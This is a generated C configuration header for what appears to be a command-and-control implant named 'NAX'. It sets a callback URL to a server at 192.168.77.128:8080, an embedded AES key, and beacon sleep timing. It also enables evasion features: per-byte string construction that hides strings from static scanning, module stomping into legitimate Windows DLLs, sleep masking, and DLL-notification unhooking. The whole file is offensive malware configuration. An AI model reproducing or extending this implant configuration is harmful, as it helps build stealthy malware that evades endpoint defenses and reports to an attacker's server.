/* Config.h - generated by BuildPayload
 *
 *   C2 URL:   http://192.168.77.128:8080/nax/prod/api/events
 *   AES Key:  e4805a14511c27050666a033e78d495d
 *   Sleep:    10000 ms   Jitter: 0%
 *   Profile:  v2, 1697 bytes
 */

#pragma once

#define NAX_SLEEP_MS    10000u
#define NAX_JITTER_PCT  0u
#define NAX_SID_LEN     17u
#define NAX_WATERMARK   0xA04A4178u
#define NAX_LISTENER_WM 0xB8A42CB7u

#define NAX_GATE_SLEEP

/* PIC-safe per-byte writes - prevents GCC from pooling into .rdata */
#define NAX_AES_KEY_WRITE( p ) do { \
    (p)[ 0]=0xE4; (p)[ 1]=0x80; (p)[ 2]=0x5A; (p)[ 3]=0x14; (p)[ 4]=0x51; (p)[ 5]=0x1C; (p)[ 6]=0x27; (p)[ 7]=0x05; \
    (p)[ 8]=0x06; (p)[ 9]=0x66; (p)[10]=0xA0; (p)[11]=0x33; (p)[12]=0xE7; (p)[13]=0x8D; (p)[14]=0x49; (p)[15]=0x5D; \
} while(0)

#define NAX_C2_URL_WRITE( p ) do { \
    (p)[ 0]='h'; (p)[ 1]='t'; (p)[ 2]='t'; (p)[ 3]='p'; (p)[ 4]=':'; (p)[ 5]='/'; (p)[ 6]='/'; (p)[ 7]='1'; \
    (p)[ 8]='9'; (p)[ 9]='2'; (p)[10]='.'; (p)[11]='1'; (p)[12]='6'; (p)[13]='8'; (p)[14]='.'; (p)[15]='7'; \
    (p)[16]='7'; (p)[17]='.'; (p)[18]='1'; (p)[19]='2'; (p)[20]='8'; (p)[21]=':'; (p)[22]='8'; (p)[23]='0'; \
    (p)[24]='8'; (p)[25]='0'; (p)[26]='/'; (p)[27]='n'; (p)[28]='a'; (p)[29]='x'; (p)[30]='/'; (p)[31]='p'; \
    (p)[32]='r'; (p)[33]='o'; (p)[34]='d'; (p)[35]='/'; (p)[36]='a'; (p)[37]='p'; (p)[38]='i'; (p)[39]='/'; \
    (p)[40]='e'; (p)[41]='v'; (p)[42]='e'; (p)[43]='n'; (p)[44]='t'; (p)[45]='s'; \
    (p)[46]='\0'; \
} while(0)

#define NAX_PROFILE_LEN  1697u
#include "Config_profile.h"

/* ---- sleep obfuscation defaults ---- */
#define NAX_DEFAULT_SLEEP_OBF   0

/* ---- BOF module stomping ---- */
#define NAX_BOF_STOMP 1

#define NAX_BOF_SYNC_DLL_WRITE( p ) do { \
    (p)[ 0]=L'c'; (p)[ 1]=L'h'; (p)[ 2]=L'a'; (p)[ 3]=L'k'; \
    (p)[ 4]=L'r'; (p)[ 5]=L'a'; (p)[ 6]=L'.'; (p)[ 7]=L'd'; \
    (p)[ 8]=L'l'; (p)[ 9]=L'l'; \
    (p)[10]=L'\0'; \
} while(0)

#define NAX_BOF_ASYNC_COUNT 2

#define NAX_BOF_ASYNC_0_WRITE( p ) do { \
    (p)[ 0]=L'j'; (p)[ 1]=L's'; (p)[ 2]=L'c'; (p)[ 3]=L'r'; \
    (p)[ 4]=L'i'; (p)[ 5]=L'p'; (p)[ 6]=L't'; (p)[ 7]=L'9'; \
    (p)[ 8]=L'.'; (p)[ 9]=L'd'; (p)[10]=L'l'; (p)[11]=L'l'; \
    (p)[12]=L'\0'; \
} while(0)

#define NAX_BOF_ASYNC_1_WRITE( p ) do { \
    (p)[ 0]=L'd'; (p)[ 1]=L'3'; (p)[ 2]=L'd'; (p)[ 3]=L'1'; \
    (p)[ 4]=L'1'; (p)[ 5]=L'.'; (p)[ 6]=L'd'; (p)[ 7]=L'l'; \
    (p)[ 8]=L'l'; \
    (p)[ 9]=L'\0'; \
} while(0)

/* ---- sleepmask stomp DLL ---- */
#define NAX_SM_STOMP_DLL_WRITE( p ) do { \
    (p)[ 0]=L'm'; (p)[ 1]=L's'; (p)[ 2]=L'x'; (p)[ 3]=L'm'; \
    (p)[ 4]=L'l'; (p)[ 5]=L'6'; (p)[ 6]=L'.'; (p)[ 7]=L'd'; \
    (p)[ 8]=L'l'; (p)[ 9]=L'l'; \
    (p)[10]=L'\0'; \
} while(0)

/* ---- DLL notification unhooking ---- */
#define NAX_UNHOOK_DLL_NOTIFY 1

/* ---- embedded sleepmask BOF ---- */
#define NAX_SLEEPMASK_LEN  3225u
#include "Config_sleepmask.h"
